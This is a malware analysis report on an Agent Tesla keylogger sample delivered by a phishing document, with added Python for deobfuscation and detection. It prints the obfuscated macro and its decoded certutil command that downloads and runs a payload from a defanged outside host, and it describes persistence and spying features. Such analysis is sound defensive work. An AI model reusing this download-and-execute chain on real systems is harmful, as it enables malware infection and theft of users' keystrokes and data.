Malware | 04/27/2018

Malware Analysis Report on new Agent Tesla (Keylogger Plus Spyware)


A complete technical report on the analysis of a new Agent Tesla sample. Agent Tesla is a powerful keylogger with spyware capabilities whose purpose is to monitor the victim’s system. It is a commercial keylogger and can be purchased from its official website.

Agent Tesla Overview

Agent Tesla belongs to the ‘Trojan.Keylogger’ family. The main purpose of this malware is to monitor the victim’s system; it is a modern, powerful keylogger with spyware capabilities.


Agent Tesla captures screenshots of the victim’s machine, keeps its logs in encrypted form on the victim’s machine and sends them to the attacker’s address.


This malware mostly spreads via phishing campaigns, arriving either as an attached document or as a malicious link.


Agent Tesla is believed to be a commercial keylogger, and anyone can easily purchase it from its official website.


(hxxps://www[.]agenttesla[.]com/about)




Let’s understand the infection process in detail:

This malware arrives via email or phishing scams in the form of an attached document or a malicious link (e.g. hxxp://plumberspro[.]us/Shippment Details[.]doc).

If the victim clicks such a link, the malicious document is downloaded to the victim’s machine.

If the user opens the malicious document outside Protected View, it automatically downloads the malware (if the C&C server is active) and executes it on the user’s system. The link above downloads the good.exe file (the malware) in the background.

good.exe is renamed to eCDiXBI.exe and placed in the “%temp%” folder.

eCDiXBI.exe then executes additional components on the user’s machine.


Technical analysis of the Agent Tesla malware (supported with screenshots):

 

File Name: Shippment Details.doc

MD5: 60F3BDB1D39EF0A45A8C6E10A8ED12E7

File Type: Document

Arrival Method: Email

 

Agent Tesla arrives via email, as shown in the screenshot:


Figure 1 Fake Email

 

If you view the email in source view, it shows the malicious link to the hosted document file.



You can also see this link in the status bar by hovering the mouse cursor over the ‘Click Here’ link.


Figure 2 Email Message Body Source


Once the user clicks this link (Click here), the document file is downloaded to the user’s machine.



 

When the user opens the document, it shows a security warning.





If the user has the security warning feature enabled, macros are disabled.


If not, the malicious script executes in the background; it also executes if the user clicks the Enable Content button.




As you can see in the following screenshot, the document contains malicious obfuscated macro code:


Figure 3 Malicious Macro Function


As you can see in the screenshot above, the malware actor used the ‘Document_Open’ event. This means that, if macros are enabled by default in the user’s Microsoft Office settings, the malicious macro starts executing in the background as soon as the document is opened.


The main obfuscated malicious code, shown below, is written so that it cannot easily be understood:


"cWmBdr.welxWeZ I/ncJ Rcaear$tiuWtnillM.Qe_xUes p-MuNrRl$cTazc(hDe- W-)sHpGlSi*tO W-mfb ]h.tktPpT:^/^/Up leuDmPbie(rWsapCrcoU.fuZs#/Ogdoxo%da.Gelx[eS A%$teeomJpl%v\L\zeSCsD[igXfB.IF.EeYxZeE ^&E&o U%ot-eamup]%k\#\zeUCvDLipXQBOIh.FeXxTeQ"

 

When we deobfuscate the above code, it looks like this:


cmd[.]exe /c certutil[.]exe -urlcache -split -f hxxp://plumberspro[.]us/good[.]exe %temp%\\eCDiXBI[.]exe && %temp%\\eCDiXBI[.]exe

 

The above script downloads the main malware payload to the user’s machine with the help of cmd.exe and certutil.exe.
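As an added illustration that is not part of the original report, the obfuscation above is a simple interleaving: every odd-offset character is filler and the real command is the sequence of even-offset characters. The Python below (our helper names; the obfuscated string is the one quoted above) recovers the command, defangs it for safe reporting and pulls out the download URL and drop path from the certutil arguments:

```python
# Added example: recover the macro's command from the interleaved-junk string
# quoted above and defang it before it is logged or shared. The obfuscated
# string is copied from the report; the helper names are ours.
from typing import Optional, Tuple

OBFUSCATED = (
    r"cWmBdr.welxWeZ I/ncJ Rcaear$tiuWtnillM.Qe_xUes p-MuNrRl$cTazc(hDe- W-)sHpGlSi*tO "
    r"W-mfb ]h.tktPpT:^/^/Up leuDmPbie(rWsapCrcoU.fuZs#/Ogdoxo%da.Gelx[eS A%$teeomJpl%v\L\zeSCsD"
    r"[igXfB.IF.EeYxZeE ^&E&o U%ot-eamup]%k\#\zeUCvDLipXQBOIh.FeXxTeQ"
)


def deobfuscate(blob: str) -> str:
    """The real command sits at even offsets; every odd offset is filler."""
    return blob[0::2]


def defang(command: str) -> str:
    """Neutralise the URL and file names so the string cannot be clicked or run."""
    return command.replace("http", "hxxp").replace(".", "[.]")


def recover_command(blob: str = OBFUSCATED) -> str:
    """Deobfuscate and defang in one step, ready for a report or ticket."""
    return defang(deobfuscate(blob))


def parse_certutil_download(command: str) -> Optional[Tuple[str, str]]:
    """Pull (source URL, drop path) out of a 'certutil -urlcache ... -f URL PATH' line."""
    tokens = command.split()
    if "-urlcache" not in tokens or "-f" not in tokens:
        return None
    i = tokens.index("-f")
    if i + 2 >= len(tokens):
        return None
    return tokens[i + 1], tokens[i + 2]


if __name__ == "__main__":
    cmd = recover_command()
    print(cmd)
    print(parse_certutil_download(cmd))
```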

 

The code takes advantage of certutil.exe: the certutil tool is normally used to dump and display CA (Certificate Authority) certificates, information and keys, but here the malware actor abuses it to download good.exe, save it into the %temp% folder under the name eCDiXBI.exe (this file is compiled with the AutoIt v3 tool) and execute eCDiXBI.exe.

 

As you can see in the screenshot, we also captured the network activity, which clearly shows the malicious macro attempting to download the file (good.exe) from the malicious site (hxxp://plumberspro[.]us).


Figure 4 Download good.exe


Following is the process tree (parent-child relationship) of the malware; you can see below how a single document file infects the user’s machine with Agent Tesla.


Figure 5 Process Tree of Agent Tesla Malware


As you can see in the screenshot above, eCDiXBI.exe created multiple sub-processes, and Agent Tesla achieves persistence by creating scheduled tasks.
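As an added defender-side example that is not part of the original report, the following Python applies three detections this chain would trigger (Office spawning a shell, certutil used as a downloader, an executable running from %temp%) to constructed process-creation events mirroring Figure 5. The paths, the placeholder URL and the field names are assumptions, modelled on the Sysmon Event ID 1 layout:

```python
# Added example: detect the chain in Figure 5 from process-creation telemetry.
# The events are constructed (placeholder paths and URL); field names follow
# the common Sysmon Event ID 1 layout but are an assumption about your source.
from typing import Dict, List

EVENTS: List[Dict[str, str]] = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c certutil.exe -urlcache -split -f http://example.invalid/good.exe %temp%\eCDiXBI.exe && %temp%\eCDiXBI.exe"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://example.invalid/good.exe C:\Users\bob\AppData\Local\Temp\eCDiXBI.exe"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Users\bob\AppData\Local\Temp\eCDiXBI.exe",
     "CommandLine": r"C:\Users\bob\AppData\Local\Temp\eCDiXBI.exe"},
    {"ParentImage": r"C:\Windows\System32\services.exe",  # benign control case
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -verify C:\certs\server.cer"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def classify(event: Dict[str, str]) -> List[str]:
    """Return the names of the rules a single event triggers."""
    parent, image = basename(event["ParentImage"]), basename(event["Image"])
    cmd = event["CommandLine"].lower()
    hits: List[str] = []
    if parent in OFFICE_APPS and image in SHELLS:
        hits.append("office-spawned-shell")      # macro launching a shell
    if image == "certutil.exe" and "-urlcache" in cmd and "://" in cmd:
        hits.append("certutil-download")         # certutil abused as a downloader
    if "\\temp\\" in event["Image"].lower():
        hits.append("exec-from-temp")            # dropped binary run from %temp%
    return hits


def detect(events: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Collect triggered rules per (lower-cased) image name."""
    findings: Dict[str, List[str]] = {}
    for ev in events:
        for hit in classify(ev):
            findings.setdefault(basename(ev["Image"]), []).append(hit)
    return findings
```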


eCDiXBI.exe drops its components into the AppData\Roaming folder, as shown in the screenshot.




It created five hidden folders (firfox, Logs, M & T Bank Corporation, Screenshot, Windata).

As you can see in the screenshot, the firfox, M & T Bank Corporation and Windata folders contain the components of Agent Tesla, whereas the Logs folder holds the log files that record the user’s keystrokes in encrypted form.




The Screenshot folder contains screenshots of the victim’s machine, which are updated every 5 minutes.





‘eCDiXBI.exe’ also creates a “dRQ0TehSm165.bat” file in the %temp% folder, which contains code that does the following:


  • Prints the message “Don’t close This Window” on the CMD console
  • Pings localhost 10 times
  • Starts firfox.exe
  • Deletes itself (dRQ0TehSm165.bat) from the %temp% location.


eCDiXBI.exe also checks whether it is running under a debugger. The following imported APIs also point to its monitoring and spying capabilities:


IsDebuggerPresent

CompareStringW

keybd_event

FileTimeToSystemTime

HttpOpenRequestW

ImageList_Create

HttpSendRequestW

SetPixel

FtpOpenFileW

SetCapture

 

As you can see in the screenshot, hxxp://plumberspro[.]us has an open directory, and anyone can easily download these malicious files, which can also be used for analysis purposes.


IOCs (Indicators of Compromise)

The following folders and files are created by eCDiXBI.exe:



 

Registries Created:



 

Network Connections:



 

Hashes:



 

Conclusion:


As seen above, visiting the malicious link and not using Protected View in the Office suite will harm your system.


Once the malicious macro script is executed, it starts infecting the victim’s machine with Agent Tesla, which records and monitors your personal activity and sends it to the attacker’s C&C server.

 
